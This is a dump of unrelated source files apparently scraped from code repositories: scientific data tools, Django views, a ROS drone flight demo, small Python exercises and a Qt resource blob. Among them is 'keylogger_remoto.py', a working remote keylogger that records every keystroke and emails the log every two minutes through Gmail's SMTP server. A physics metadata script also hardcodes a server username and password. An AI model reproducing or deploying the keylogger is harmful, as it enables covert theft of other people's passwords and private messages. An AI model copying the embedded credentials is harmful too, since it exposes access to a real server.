sys.argv: print("# POS\tRES\tIUPRED2\tANCHOR2") else: print("# POS\tRES\tIUPRED2") for pos, residue in enumerate(sequence): print('{}\t{}\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end="") if '-a' in sys.argv: print("\t{:.4f}".format(anchor2_res[pos]), end="") print()
2.796875
3
Badger/DataLoader/AMGA/readAttributes.py
zhangxt-ihep/IHEPDIRAC
0
12796640
#!/usr/bin/env python # -*- coding:utf-8 -*- # author: linlei #for data/all name of file like run_0023454_All_file014_SFO-2.dst #for data/skim & mc, we use new file naming rule, #file name like resonance_eventType_streamId_runL_runH_*.dst import os import os.path import ROOT from ROOT import gROOT from amga import mdclient,mdinterface import string import re import time #get number behiend string "exp" def getNum(expNum): format = re.compile(r"\d+") res = format.search(expNum) if res is not None: return res.group() #Get expNum and resonance from ExpSearch according runids def getExpRes(runids): entries = [] expRes = {} expNumList = [] resList = [] #print"runids",runids client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') #get all entries under catalog "/BES3/ExpSearch" client.listEntries('/BES3_test/ExpSearch') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] if entries is None: print "ExpSearch directory is empty, please run createBesDir first" return Flase for item in entries: #for each entry,get its attributes in amga client.getattr(item,['Id','runFrm','runTo','expNum','resonance']) result = client.getEntry()[1] # print item # print result runfrm = string.atoi(result[1]) runto = string.atoi(result[2]) for runid in runids: #check all runid whether between runfrm and runto of each entry #under catalog "/BES3/ExpSearch" if runfrm<=runid<=runto: #if this runid between runfrm and runto,and expNum isn't in expNumList #add this expNum to expNumList if result[3] not in expNumList: expNumList.append(result[3]) #resonance of this id isn't in resonance List,add it to resList if result[4] not in resList: resList.append(result[4]) #only including one resonance if len(resList) == 1: expRes["resonance"] = resList[0] else: #has several resonances,may be has something wrong to this file print "serveral resonance:",resList return False #only including one expNum if len(expNumList) == 1: expRes["expNum"] = expNumList[0] else: #if including several expNums,combine these expNum into mexpN1pN2p... sorted(expNumList) str = "m" + expNumList[0] for expNum in expNumList[1:]: str = str + "p+" + getNum(expNum) expRes["expNum"] = str return expRes #check whether eventType is stored in eventTypeList in amga def eventTypeCheck(eventType): entries = [] client = mdclient.MDClient('badger01.ihep.ac.cn',8822,'amga','Amg@Us3r') #client = mdclient.MDClient('besdev01.ihep.ac.cn',8822,'root') client.listEntries('/BES3_test/EventTypeList') entry = client.getEntry()[0] while entry: entries.append(entry) entry = client.getEntry()[0] for entry in entries: #get name of each entry client.getattr(entry,['FILE']) result = client.getEntry()[1] #compare eventType with name of each entry if eventType == result[0]: return True return False #judge format of file class JudgeFormat(Exception): def __init__(self, format): self.format = format def __str__(self): return repr("the File's format is not ",self.format) #type of srcformat is list,it includes many formats def checkFormat(srcformat,file): flag = 0 #print "file",file for format in srcformat: #if format of file is in srcformat if file.endswith(format): flag = 1 return flag #Before reading information from .root file,we need to use changeFormat #function to create a .root link for .dst file def changeFormat(dstfile,rootfile,srcformat=[".dst",".tag"],destformat=[".root"]): flag = checkFormat(srcformat,dstfile) if flag==0: raise JudgeFormat(srcformat) return flag = checkFormat(destformat,rootfile) if flag==0: raise JudgeFormat(destformat) return #if this rootfile has exists,then delete it if os.path.exists(rootfile): os.unlink(rootfile) #create a new rootfile for dstfile os.symlink(dstfile,rootfile) return rootfile #dstfile like /bes3fs/offline/data/655-1/4040/dst/110504/run_0023474_All_file007_SFO-2.dst, #return run_0023474_All_file007_SFO-2 def getLFN(dstfile,format=[".dst",".tag"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return #split dstfile by "/",then get "lfn.dst" items=dstfile.split("/") length=len(items) filename=items[length-1] #split "*.dst" by "." #get lfn lfn = filename.split('.')[0] return lfn #get size of dst file def getFileSize(dstfile,format = [".dst",".tag"]): flag = checkFormat(format,dstfile) if flag==0: raise JudgeFormat(format) return if os.path.exists(dstfile): #get file's size return os.path.getsize(dstfile) #lfn like resonance_eventType_streamId_runL_runH_*,get attributes:resonance,eventType,streamId,runL,runH #lfn like run_0009947_All_file001_SFO-1,get attribute runId def splitLFN(lfn,type): result = {} items = lfn.split("_") if type == "all": if items[2] == "All": runId = string.atoi(items[1]) return runId else: result["resonance"] = items[0] result["eventType"] = items[1] result["streamId"] = items[2] result["runL"] = string.atoi(items[3]) result["runH"] = string.atoi(items[4]) return result #get runIdList from JobOptions def getRunIdList(jobOptions): result = {} runIdList = [] str1=jobOptions[0] pat = re.compile(r'RunIdList= {-\d+(,-?\d+)+}') res1 = pat.search(str1) if res1 is not None: #get a string like:RunIdList={-10513,0,-10629} str2 = res1.group() result["description"] = str2 pat = re.compile(r'-\d+(,-?\d+)+') list = pat.search(str2) if list is not None: #get a string like:-10513,0,-10629 runIds = list.group() #split runIds according ',' items=runIds.split(',') #members' style in items is string,we need to change their style to integer for i in items: if i!='0': runid=abs(string.atoi(i)) runIdList.append(runid) result["runIdList"] = runIdList return result #get Boss version, runid, Entry number, JobOptions from root file def getCommonInfo(rootfile): commoninfo = {} gROOT.ProcessLine('gSystem->Load("libRootEventData.so");') gROOT.ProcessLine('TFile file("%s");'%rootfile) gROOT.ProcessLine('TTree* tree =(TTree*)file.Get("JobInfoTree");') gROOT.ProcessLine('TTree* tree1 =(TTree*)file.Get("Event");') gROOT.ProcessLine('TBranch* branch =(TBranch*)tree->GetBranch("JobInfo");') gROOT.ProcessLine('TBranch* branch1 =(TBranch*)tree1->GetBranch("TEvtHeader");') gROOT.ProcessLine('TJobInfo* jobInfo = new TJobInfo();') gROOT.ProcessLine('TEvtHeader* evtHeader = new TEvtHeader();') gROOT.ProcessLine('branch->SetAddress(&jobInfo);') gROOT.ProcessLine('branch1->SetAddress(&evtHeader);') gROOT.ProcessLine('branch->GetEntry(0);') gROOT.ProcessLine('branch1->GetEntry(0);') gROOT.ProcessLine('Int_t num=tree1.GetEntries()') #get Boss Version commoninfo["bossVer"] = ROOT.jobInfo.getBossVer() #get RunId commoninfo["runId"] = abs(ROOT.evtHeader.getRunId()) #get all entries commoninfo["eventNum"] = ROOT.num #get TotEvtNo #commoninfo["TotEvtNo"] = list(i for i in ROOT.jobInfo.getTotEvtNo()) #get JobOption commoninfo["jobOptions"] = list(i for i in ROOT.jobInfo.getJobOptions()) #set DataType commoninfo["dataType"]='dst' return commoninfo #get bossVer,eventNum,dataType,fileSize,name,eventType,expNum, #resonance,runH,runL,status,streamId,description class DataAll(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} runIds = [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print "Content of this file is null:",self.dstfile return "error" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get name by calling getLFN function attributes["fileSize"] = getFileSize(self.dstfile) attributes["LFN"] = getLFN(self.dstfile) #for .dst files of Data/All,their EventType are "all" attributes["eventType"] = "all" #get runId from filename runId = splitLFN(attributes["LFN"],"all") #compare runid of rootfile with runid in filename if attributes["runId"] == runId: runIds.append(attributes["runId"]) #get expNum and Resonance by calling getExpRes(runIds) expRes = getExpRes(runIds) if expRes == False: print "Can't get expNum and resonance of this file" return "error" attributes["expNum"] = expRes["expNum"] attributes["resonance"] = expRes["resonance"] #set RunH=RunId and RunL=RunId attributes["runH"] = attributes["runId"] attributes["runL"] = attributes["runId"] else: print "runId of %s,in filename is %d,in rootfile is %d"%(self.dstfile,lfnInfo["runId"],attributes["runId"]) return "error" #set values of attribute status,streamId,Description #and these values are null #-1 <=> value of status is null #-1 <=> value of streamId is null #null <=> value of Description is null attributes["status"] = -1 attributes["streamId"] = 'stream0' attributes["description"] = 'null' del attributes["runId"] del attributes["jobOptions"] return attributes #get resonance,runL,runH,eventType,streamId,LFN from file name #file name like resonance_eventType_streamId_runL_runH_*.dst #get bossVer,runL,runH,eventNum by reading information from rootfile class Others(object): def __init__(self,dstfile,rootfile): self.dstfile = dstfile self.rootfile = rootfile def getAttributes(self): #store all attributes attributes = {} expRes = {} lfnInfo = {} runIds = [] #change the .dst file to .root file rootfile = changeFormat(self.dstfile,self.rootfile) if getFileSize(self.dstfile)<5000: print "Content of this file is null:",self.dstfile return "error" else: attributes = getCommonInfo(rootfile) #get filesize by calling getFileSize function #get lfn by calling getLFN function attributes["fileSize"] = getFileSize(self.dstfile) attributes["LFN"] = getLFN(self.dstfile) #get resonance,eventType,streamId,runL,runH in filename by calling splitLFN function lfnInfo = splitLFN(attributes["LFN"],"others") #if runL is equal to runH,this file only has one runId if lfnInfo["runL"] == lfnInfo["runH"]: #if runId in filename also is equal to runId in rootfile if attributes["runId"] == lfnInfo["runL"]: runIds.append(attributes["runId"]) attributes["runL"] = attributes["runId"] attributes["runH"] = attributes["runId"] #get expNum and Resonance by calling getExpRes() expRes = getExpRes(runIds) if expRes == False: print "Can't get expNum and resonance of this file" return "error" attributes["expNum"] = expRes["expNum"] attributes["description"] = "null" #if resonance in filename is same as resonance that get from ExpSearch if expRes["resonance"] == lfnInfo["resonance"]: attributes["resonance"] = expRes["resonance"] else: print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"]) return "error" else: print "Error %s:in the filename,runL = runH = %d,but runId in the root file is %d"%(self.dstfile,lfnInfo["runL"],attributes["runId"]) return "error" else: #this dst file has several runIds,get them from JobOptions by calling getRunIdList function result = getRunIdList(attributes["jobOptions"]) if result is not None: runH = max(result["runIdList"]) runL = min(result["runIdList"]) if runL == lfnInfo["runL"]: if runH == lfnInfo["runH"]: attributes["runL"] = lfnInfo["runL"] attributes["runH"] = lfnInfo["runH"] #get expNum and Resonance by calling getExpRes(runid) expRes = getExpRes(result["runIdList"]) if expRes == False: print "Error:",this.dstfile return "error" attributes["expNum"] = expRes["expNum"] attributes["description"] = result["description"] if expRes["resonance"] == lfnInfo["resonance"]: attributes["resonance"] = lfnInfo["resonance"] else: print "Error %s:resonance in filename is %s,in ExpSearch is %s"%(self.dstfile,lfnInfo["resonance"],expRes["resonance"]) return "error" else: print "Error %s:runH in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runH"],runH) return "error" else: print "Error %s:runL in filename is %d,in jobOptions is %d"%(self.dstfile,lfnInfo["runL"],runL) return "error" #get streamId from filename attributes["streamId"] = lfnInfo["streamId"] #check eventType in filename evtType_exists = eventTypeCheck(lfnInfo["eventType"]) if evtType_exists == True: attributes["eventType"] = lfnInfo["eventType"] else: print "Error %s:eventType %s in filename is not stored in AMGA"%(self.dstfile,lfnInfo["eventType"]) return "error" #set values of attribute status #-1 <=> value of status is null attributes["status"] = -1 del attributes["runId"] del attributes["jobOptions"] return attributes if __name__=="__main__": import time start=time.time() obj = DataAll("/bes3fs/offline/data/661-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_661.root") end = time.time() print "661:",str(start - end) start = time.time() obj = DataAll("/bes3fs/offline/data/655-1/psipp/dst/100118/run_0011414_All_file001_SFO-1.dst","/panfs/panfs.ihep.ac.cn/home/data/linl/DataAll/new/all/test_655.root") end = time.time() print "655:",str(start - end)
2.125
2
rivet/views.py
DruidGreeneyes/rivet_site
0
12796641
<reponame>DruidGreeneyes/rivet_site<gh_stars>0 from django.shortcuts import render, get_object_or_404 from django.http import HttpResponseRedirect, HttpResponse from django.core.urlresolvers import reverse from .models import Comparison from pyrivet_core.sqlite3_lexicon import Lexicon from pyrivet_core import rivet # Create your views here. def get_latest_comparisons(num=5): return Comparison.objects.order_by('id')[:num] def index(request): latest_comparisons = get_latest_comparisons() context = { 'latest_comparisons': latest_comparisons, } output = render(request, 'rivet/index.html', context) return output def submit(request): try: document_a, document_b = sorted((request.POST['doca'], request.POST['docb'])) do_deep = 'deep' in request.POST except KeyError: latest_comparisons = get_latest_comparisons() return render(request, 'rivet/index.html', { 'latest_comparisons': latest_comparisons, 'error_message': "Bad Input!" }) else: try: cmp = Comparison.objects.get(document_a=document_a, document_b=document_b) except Comparison.DoesNotExist: print("Comparing documents: ") if do_deep: with Lexicon.open(size=1000, nnz=8) as lex: result = rivet.compare_documents(document_a, document_b, lexicon=lex, ingest=True) else: result = rivet.compare_documents(document_a, document_b) result = result[0][1] cmp = Comparison(document_a=document_a, document_b=document_b, result=result) cmp.save() return HttpResponseRedirect(reverse('comparison', args=(cmp.id,))) def comparison(request, comparison_id): c = get_object_or_404(Comparison, pk=comparison_id) r = c.result r -= 0.55 r *= 2.2 r = int(r * 100) return render(request, 'rivet/comparison.html', {'comparison': c, 'result': r})
2.171875
2
openuav-app/dockerfiles/openuav_sample/ros-setups/intel-edison/setpoint_demo.py
harishanand95/openuav-playground
23
12796642
#!/usr/bin/env python # vim:set ts=4 sw=4 et: # # # **************************************************************************** # * # * Copyright (c) 2015 UAVenture AG. All rights reserved. # * Author: <NAME> <<EMAIL>> # * # * Redistribution and use in source and binary forms, with or without # * modification, are permitted provided that the following conditions # * are met: # * # * 1. Redistributions of source code must retain the above copyright # * notice, this list of conditions and the following disclaimer. # * 2. Redistributions in binary form must reproduce the above copyright # * notice, this list of conditions and the following disclaimer in # * the documentation and/or other materials provided with the # * distribution. # * 3. Neither the name PX4 nor the names of its contributors may be # * used to endorse or promote products derived from this software # * without specific prior written permission. # * # * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS # * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE # * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, # * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, # * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS # * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED # * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT # * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN # * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # * POSSIBILITY OF SUCH DAMAGE. # * # **************************************************************************** import rospy import thread import threading import time from geometry_msgs.msg import PoseStamped, Quaternion from math import * from mavros.srv import CommandBool from mavros.utils import * from std_msgs.msg import Header from std_msgs.msg import String from tf.transformations import quaternion_from_euler class Setpoint: def __init__(self, pub, rospy): self.pub = pub self.rospy = rospy self.x = 0.0 self.y = 0.0 self.z = 0.0 try: thread.start_new_thread( self.navigate, () ) except: print "Error: Unable to start thread" # TODO(simon): Clean this up. self.done = False self.done_evt = threading.Event() sub = rospy.Subscriber('/mavros/local_position/local', PoseStamped, self.reached) def navigate(self): rate = self.rospy.Rate(10) # 10hz msg = PoseStamped() msg.header = Header() msg.header.frame_id = "base_footprint" msg.header.stamp = rospy.Time.now() while 1: msg.pose.position.x = self.x msg.pose.position.y = self.y msg.pose.position.z = self.z # For demo purposes we will lock yaw/heading to north. yaw_degrees = 0 # North yaw = radians(yaw_degrees) quaternion = quaternion_from_euler(0, 0, yaw) msg.pose.orientation = Quaternion(*quaternion) self.pub.publish(msg) rate.sleep() def set(self, x, y, z, delay=0, wait=True): self.done = False self.x = x self.y = y self.z = z if wait: rate = rospy.Rate(5) while not self.done: rate.sleep() time.sleep(delay) def reached(self, topic): #print topic.pose.position.z, self.z, abs(topic.pose.position.z - self.z) if abs(topic.pose.position.x - self.x) < 0.5 and abs(topic.pose.position.y - self.y) < 0.5 and abs(topic.pose.position.z - self.z) < 0.5: self.done = True self.done_evt.set() def setpoint_demo(): pub = rospy.Publisher('/mavros/setpoint_position/local', PoseStamped, queue_size=10) rospy.init_node('pose', anonymous=True) rate = rospy.Rate(10) setpoint = Setpoint(pub, rospy) print "Climb" setpoint.set(0.0, 0.0, 3.0, 0) setpoint.set(0.0, 0.0, 10.0, 5) print "Sink" setpoint.set(0.0, 0.0, 8.0, 5) print "Fly to the right" setpoint.set(10.0, 4.0, 8.0, 5) print "Fly to the left" setpoint.set(0.0, 0.0, 8.0, 5) offset_x = 0.0 offset_y = 0.0 offset_z = 10.0 sides = 360 radius = 20 print "Fly in a circle" setpoint.set(0.0, 0.0, 10.0, 3) # Climb to the starting height first i = 0 while not rospy.is_shutdown(): x = radius * cos(i*2*pi/sides) + offset_x y = radius * sin(i*2*pi/sides) + offset_y z = offset_z wait = False delay = 0 if (i == 0 or i == sides): # Let it reach the setpoint. wait = True delay = 5 setpoint.set(x, y, z, delay, wait) i = i + 1 rate.sleep() if (i > sides): print "Fly home" setpoint.set(0.0, 0.0, 10.0, 5) break # Simulate a slow landing. setpoint.set(0.0, 0.0, 8.0, 5) setpoint.set(0.0, 0.0, 3.0, 5) setpoint.set(0.0, 0.0, 2.0, 2) setpoint.set(0.0, 0.0, 1.0, 2) setpoint.set(0.0, 0.0, 0.0, 2) setpoint.set(0.0, 0.0, -0.2, 2) print "Bye!" if __name__ == '__main__': try: setpoint_demo() except rospy.ROSInterruptException: pass
1.632813
2
tests/models/test_models.py
kynk94/torch-firewood
1
12796643
import importlib import sys import pytest from firewood import models gan = ["gan." + model for model in models.gan.__all__] semantic_segmentation = [ "semantic_segmentation." + model for model in models.semantic_segmentation.__all__ ] all_models = gan + semantic_segmentation @pytest.mark.parametrize("model", all_models) def test_models(model: str) -> None: module = importlib.import_module("firewood.models." + model) sys.argv = [""] module.main()
2.0625
2
keylogger_remoto.py
HerikCarvalho/keylogger_remoto_py
0
12796644
# keylogger_remoto_py #Um Keylogger Remoto em Python import keyboard # para keylogs import smtplib # para enviar email usando o protocolo SMTP (gmail) # O semáforo é para bloquear o segmento atual # O temporizador é para executar um método após uma quantidade de tempo "intervalo" from threading import Semaphore, Timer SEND_REPORT_EVERY = 120 # 02 minutes EMAIL_ADDRESS = "<seu_endereço_de_email>" EMAIL_PASSWORD = "<<PASSWORD>>" class Keylogger: def __init__(self, interval): # passaremos SEND_REPORT_EVERY para o intervalo self.interval = interval # esta é a variável de string que contém o log de todos # as teclas dentro de "self.interval" self.log = "" # para bloquear após definir o ouvinte on_release self.semaphore = Semaphore(0) def callback(self, event): """ Esse retorno de chamada é chamado sempre que um evento de teclado ocorre (ou seja, quando uma chave é liberada neste exemplo) """ name = event.name if len(name) > 1: # não é um caractere, tecla especial (por exemplo, ctrl, alt etc.) # maiúsculas com [] if name == "space": # " "em vez de "espaço" name = " " elif name == "enter": # adicione uma nova linha sempre que um ENTER for pressionado name = "[ENTER]\n" elif name == "decimal": name = "." else: # substituir espaços por sublinhados name = name.replace(" ", "_") name = f"[{name.upper()}]" self.log += name def sendmail(self, email, password, message): # gerencia uma conexão com um servidor SMTP server = smtplib.SMTP(host="smtp.gmail.com", port=587) # conectar-se ao servidor SMTP como modo TLS (por segurança) server.starttls() # faça login na conta de email server.login(email, password) # envie a mensagem real server.sendmail(email, email, message) # finaliza a sessão server.quit() def report(self): """ Esta função é chamada todo "self.interval" Ele basicamente envia keylogs e redefine a variável "self.log" """ if self.log: # se houver algo no log, relate-o self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) # pode imprimir em um arquivo, o que você quiser # imprimir(self.log) self.log = "" Timer(interval=self.interval, function=self.report).start() def start(self): # inicie o keylogger keyboard.on_release(callback=self.callback) # comece a relatar os keylogs self.report() # bloquear o segmento atual # desde on_release () não bloqueia o segmento atual # se não o bloquearmos, quando executarmos o programa, nada acontecerá # isso ocorre porque on_release () iniciará o ouvinte em um thread separado self.semaphore.acquire() if __name__ == "__main__": keylogger = Keylogger(interval=SEND_REPORT_EVERY) keylogger.start() #by Herik_Carvalho
3.375
3
Hash/keyword-rows.py
nishantml/Data-Structure-And-Algorithms
0
12796645
<filename>Hash/keyword-rows.py """ Given a List of words, return the words that can be typed using letters of alphabet on only one row's of American keyboard like the image below. Example: Input: ["Hello", "Alaska", "Dad", "Peace"] Output: ["Alaska", "Dad"] Note: You may use one character in the keyboard more than once. You may assume the input string will only contain letters of alphabet. """ from typing import List class Solution: def findWords(self, words: List[str]) -> List[str]: row1 = ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p']; row2 = ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'] row3 = ['z', 'x', 'c', 'v', 'b', 'n', 'm'] inteligentWords = [] for word in words: Hash = {'first': 0, 'second': 0, 'third': 0} for letter in list(word.lower()): if letter in row1: Hash['first'] = Hash['first'] + 1 if letter in row2: Hash['second'] = Hash['second'] + 1 if letter in row3: Hash['third'] = Hash['third'] + 1 if Hash['first'] == len(word) or Hash['second'] == len(word) or Hash['third'] == len(word): inteligentWords.append(word) return inteligentWords
4.375
4
strings/split_join.py
janbodnar/Python-Course
13
12796646
<reponame>janbodnar/Python-Course #!/usr/bin/python # split_join.py nums = "1,5,6,8,2,3,1,9" n = nums.split(",") print (n) m = ':'.join(n) print (m)
3.8125
4
src/pangadfs_gui/resources.py
sansbacon/pangadfsGUI
0
12796647
<gh_stars>0 # Resource object code (Python 3) # Created by: object code # Created by: The Resource Compiler for Qt version 6.2.2 # WARNING! All changes made in this file will be lost! from PySide6 import QtCore qt_resource_data = b"\ \x00\x00\x03m\ \x89\ PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\ \x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\ \x00\x00\x00\x19tEXtSoftware\ \x00Adobe ImageRead\ yq\xc9e<\x00\x00\x03\x0fIDATx\xda\x8c\ S[k\x13A\x14>;{K\xd3&\xbd\xc4Vk\ \xbc\xa4\x17\xac\xb4\xd6V#R+j\xa5*\x0aZh\ \xc1\xe2\x83\x0f>\xf5A,\x14\xfa'\x04\x1f\x14\x04\xa1\ \x05\x8b`|T\xa1*\xa8\xf5\x8a (j\xbd\xd2\x0b\ \x8dI\x89\xb76ib\x93\xddl2\xbb;\xeb\x99\x90\ *\xfa\xe4\xc0\xb7s8\xfb\x9d33\xdf9G\xe8\x1a\ [\x00\x10\x04XY\x0ec`\xdb6\x18\x9a\x06\x92,\ \x03\x11\xc5\x82_QU\xa4\x09#h>\xb3,+d\ \x99&X\x94\x82\x04\xff\xb9L\x0c \x84\x04\xd1\x0c\x16\ ]!\xfe\xe1\x09\xce\x80\xe3\xd4\xe1\x9eFD\x10\xcf\x11\ sER\xd0q\x9c>\xdc\xb7:\xb6]\xc3\xf0f\xbd\ ]\xeb\x827\x9f|\x19\xc2\x98B\x12\x09\xaf\xd3p\xfc\ @m}Z\xb7\xcd\xef\x89\x5c\xfd\xcc\xbc\xb6\x03y\x0f\ \x91\x10\x10\x05v\xaa\xb9\xde[\xb3\xda\xe7.w)\xa2\ K\x00AL$(\x1c\xe9X\x13\x1c\x7f:?\x84\x09\ \x12\x12\x7f\x0b*@\x1c\x13T\x9f[Q\xf7\xb4Vz\ \x1f\xbc\xf82\xecq\x8b\x81\xbd;\xfckL\x0a\xb2M\ \x1d0\xc1A\x0d\x1c\xa0\xd4\x82|^\x023\x9f/\x5c\ QB!\xc27&\xa2R\xc0_VV[U\xea\x8b\ \xccgVY9\xa3\xb5sg\xa0L\xd7lQ\x94\x80\ }\x8e%\xbeEb?\x93z\x96\x9a=\xdd\xcd\xc1\x1b\ \xf7>\xbeFA/\x88\xb2|Wh;\xfb\x81\xeb\xb0\ \x11\xdfzhU\xa5k\xbb\xb6\x9c9\xd6\xd2T[\xa9\ *\xaab3\xcby\xfb)6\xbb\x94\xcc>\x12\x08\x19\ \xc1\x0a]\xe6\xa7\xf2`YUC\x92\xa2\x80\x94I&\ -\xf4\x85\xd1;\x9aNX\xe3~\x7fEI\x9c\x09J\ &\xa5A6\xb6\x90\x89\xc7\xb50\x91\xa4A\x0c\xb6\x91\ w\x0e\xd1\x80\x87\x85h.\x07\x1c$\x9dL*\x88\xed\ Z*uQ)\x11\x1b\xf4\xba:\xcf$UA7(\ ]H\xe9Y\xaf\xcf\xfb\x15\x83\x060\x9eW\xaa\x03Q\ \x8d\x09\xf6S\xc3\x00}y\x19DyK\xdf%\xaf\xa7\ d\xb0\xbaiC[\xba\xbd=\x10a.REL;\ \xf1\xf2\x83nl\xda<-\x06\xd6I.\xc1\xae\xa2Z\ 6h\x199\xb6\xaf\x7fwcx2\xcc\x93P\xc6X\ T(=q\xf5\xd5\x91\xd3\xfd\xc1\xdbi\x05L,m\ \xb5m\x98t\xe2\xd1\x0f\x82?\xd5\xc3\x07\x96\x16\x05\x97\ D\xb0L\x1e\x19\xc0\x8bjEu\x80m\x15\x00\xb1k\ \xb7\xe6\x0a}`b;N\xe7\xf1\x08=\x99g\x91\xe8\ \xcf\xe5wS\x8b\x8c\xd2+n\x8f'\x9a\xbds\xbf\xdb\ \xd7\xd4Xn\xae\xf5\xbb-O\x99\x92#\x12a\x98\xcc\ `\x00\xb4XFA\xec\x19\x19\xc1\xeb\xb4\xa3\x1dG\xbc\ G\x85\xaf\x93T\xf8\xb5\xea.\x01\xf0mjD\xf1v\ \xa1\x9f\xbf\xbf\x1cA\xd6\x0f\x9cl\x8c\x8d\x86\xe6\x907\ \x8e\xe2>\x16\x84\xa6\xa38A\x7fz\xde\x99\xbd\xfd\xd7\ \x0c\xc8-\xbd\xbfm\xe4\x9e/p\x123\xe3l\xfa\xd6\ c{q\x8a7a\x012\x1f8\x84\xab\x08\xb5\xb8s\ \xbf\xb8\x92\x80t\x0e\x1f\x84\x5cj\x96\xbd\x19\xe3\xf3\x92\ A\x18+\x09H\x91(\xfd\x03R\xc4\xcab|0\x11\ \x5c\x00\xca\xed_\x02\x0c\x00\xa6=o\xdb2\xe1%J\ \x00\x00\x00\x00IEND\xaeB`\x82\ \x00\x00\x02\xdb\ \x89\ PNG\x0d\x0a\x1a\x0a\x00\x00\x00\x0dIHDR\x00\ \x00\x00\x10\x00\x00\x00\x10\x08\x06\x00\x00\x00\x1f\xf3\xffa\ \x00\x00\x00\x19tEXtSoftware\ \x00Adobe ImageRead\ yq\xc9e<\x00\x00\x02}IDATx\xda\x8c\ \x93\xdfK\x93Q\x18\xc7\xbf\xef\xd9\xd9t3s\xad\x9c\ LG\xcd\xb5i\x18\x85\x91\xd4\x8d\x10\x98AR\x17A\ ^ue\x17\x15A\x7fB\x16DPDw]G\xd7\ F\x91A\xdeu\x11\x95\x11\x1a\x94\x09\x22-\x86\xe9\x9c\ ,$+u\x93\xf7=?z\xce\xd9\xa6.\x08:p\ 8\xcf\xf9\xf1|\xdf\xcf\xf7<\xefq&\xef\xc06\xc7\ \xc1E\x1a\x12\xf8\xbf6\xa75\x1e\xdd\xdb\xb8\x09\xae+\ +\xb4\x90\xec\x1a\xbc{}=?\x0bGi\x84\xf6\xb4\ #\x18\x8e\x83\xf9\x02\xb5\xa9\x9cc\xf2\xe1\x85\xdb#\xee\ Py\xaa\xd4\xe6\x16k\x88\xa6)q?\xdc\xd5\x02\xd6\ \xf3_0\xfe\xf6\x0d\x9c\xc4\x99\x9a|\xc7\xef\xc7\x07\xef\ \xf4\xd1y\xb5\xef2M\x97\xb8\xd4[\x02J\x0ah\xcf\ \x03\xaf\x0b#\xdc\xd9\x8bX\xc1A{\xef%\x84B!\ 0\xc66\x0f\xf6\x9f\xbc6@\xc3\xc0\xf9\xe1\xe1\xab\x5c\ n\x11\xf8\xb4\x940\xdd6!\xf0b\xa9\x84\xb1\xd7?\ \xa1\xd4\x0f\xf0]QH\xc2\x95\xb4\xafh|\xdf\xd7\x04\ %\xa5\xc3\xab\xe7\xab\x02\x86\xc2\xe2\xd0\x17\xd5\xc6:N\ \xb43J\xd2x\xf7\x0b\xe8K\x18\x01\x85\x97YX\x11\ !\x84\xc3\xc56\x02%=H\xe1U\x0c9h\xd0.\ \xd6\x96V\xa0\xe9p\x7f\x84C\x16\x94%\xec\x0f\x92\x90\ \xdea\x04\xd8v\x0b\x5c\x09\x22\x10e\x02\x87\xf9\x10T\ .\xae\xa4\x1a\xed|qm\x05=\x1d\x1d6\x1e\x9f\x9e\ &\x818\x84\xe71.j,\x88-\x0b\xd2G\xb8\x02\ 3\xb9\x9c\xf1\x8a\xb6\xb66L\xcc\xce\xda;\xb0Wd\ ,X\x81\x1a\x02\x0f\xaabA\x99;\xa0\xc3\xe9\xd6V\ ;\xff^,\xe2H:m\xe3\x89\x99\x19\x22\xd0e\x81\ \xcf\xdf\x80\xaex\xe5\x0e\x08_\x8a\xea%\xfa\xac\x9dL\ >o\x85b\xb1\x18>f2\x9b\x04\xa6\x22\x1e\x09\xb0\ \x1b#\x80\x11\xf1\x04\x02\xcaZ\xf0*\xdd\xc4\x0a\xc9\x96\ \x16\xa4\x88b\xc3uq(\x99Dw\x85\xc2\x10X\x01\ \x8a\x83\xb7\x9e \xf2\xbb\x84\x9d\x9a\x12\x94-e\xf9\x7f\ 0%\xcb\x16\x0a\xf8J\x14\xa6Mg\xb3\xf8D\x14U\ \x01\xb7T\xaa\xe3\x14\xd7S\x8fL\xcd!\x9fz\xf5t\ 5q\xa0\xa7\xbeiw\xccoJ\xd7\xecW\x8867\ \xdb\x84\x16\xb2P\xf3$\xe8\x97^Y^np\xaa\x0b\ \xa7\x0e\x03\x83\xc7q\x8e\xde\xd1@$\x1a\xefL\x1d<\ \x96x\xfcl\x8c=\x98\xda\xfb\x9c\x05\x02%\x871\xf9\ 